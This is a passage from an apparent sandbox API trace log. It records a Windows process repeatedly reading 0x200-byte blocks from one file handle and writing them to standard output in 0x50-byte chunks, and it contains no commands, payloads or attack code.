hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, 
lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.095] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.095] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: 
hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.096] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.096] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 
[0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.097] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.097] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, 
lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.098] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.098] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 
0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.099] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.099] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) 
returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.101] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.101] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.102] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.102] ReadFile 
(in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] 
